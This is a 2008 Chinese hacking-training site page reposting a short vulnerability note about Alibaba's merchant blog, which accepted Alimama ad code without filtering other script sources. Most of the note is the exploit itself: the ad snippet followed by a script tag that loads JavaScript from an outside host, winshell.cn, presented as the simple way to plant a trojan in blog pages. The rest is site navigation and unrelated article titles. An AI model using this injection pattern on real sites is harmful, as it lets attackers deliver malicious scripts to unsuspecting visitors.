阿里巴巴网商博客可插入恶意代码

　-->开创网络首先基于以学员为中心的人性化教学方式。以案例式教学、互动式教学为主线。

当前位置: 首页 > VIP专区 > VIP文章 > 漏洞研究 >

阿里巴巴网商博客可插入恶意代码

发布者ID：3 作者：　发布时间：2008-08-02 08:45:55　来源：点击：

文章作者：攻击者
信息来源：安全警戒线 www.hackeroo.com
文章备注：已经给马云发E-MAIL
在阿里巴巴网商博客中允许我们填加阿里妈妈的广告，但是他却没有过滤掉除了阿里妈妈以外的地址,从而可以使用JS挂马，简单的不能在简单的利用方法：

<script type="text/JavaScript">
alimama_pid="mm_10031051_1309365_2877941";
alimama_titlecolor="0000FF";
alimama_descolor ="000000";
alimama_bgcolor="FFFFFF";
alimama_bordercolor="E6E6E6";
alimama_linkcolor="008000";
alimama_bottomcolor="FFFFFF";
alimama_anglesize="0";
alimama_bgpic="0";
alimama_icon="0";
alimama_sizecode="22";
alimama_width=120;
alimama_height=240;
alimama_type=2;
</script>
<script src="http://a.alimama.cn/js.js" type=text/javascript></script>
<script src="http://www.winshell.cn/js.js" type=text/javascript></script>

阿里巴巴网商博客可插入恶意代码

解密后的cdnprot.sys中的见不了阳光的东西

中国"反垄断法"磨砺14年今起正式实施

Vista系统新知 Windows Meeting Space

Shellcode学习之栈溢出原理初探

Shellcode学习之定制特殊的shellcode

如何对PHP程序中的常见漏洞进行攻击与防护

自己打造XP的安全防线

妙用优化大师，网速将会提升到你的最高点

金山、江民拒绝跟进免费杀毒

培训课程

巧用mstsc命令登录到console的方法

团队介绍

Linkideo免费Vpn

就业前景

无标题文档

关于我们 | 联系方法 | 招聘信息 | 加入会员 | 诚征代理 | 广告服务 | 欢迎投稿 | 友情链接

版权所有：吉林省开创科技信息有限公司

服务热线：0431-84714442

Copyright 2001 - 2007 All Rights Reserved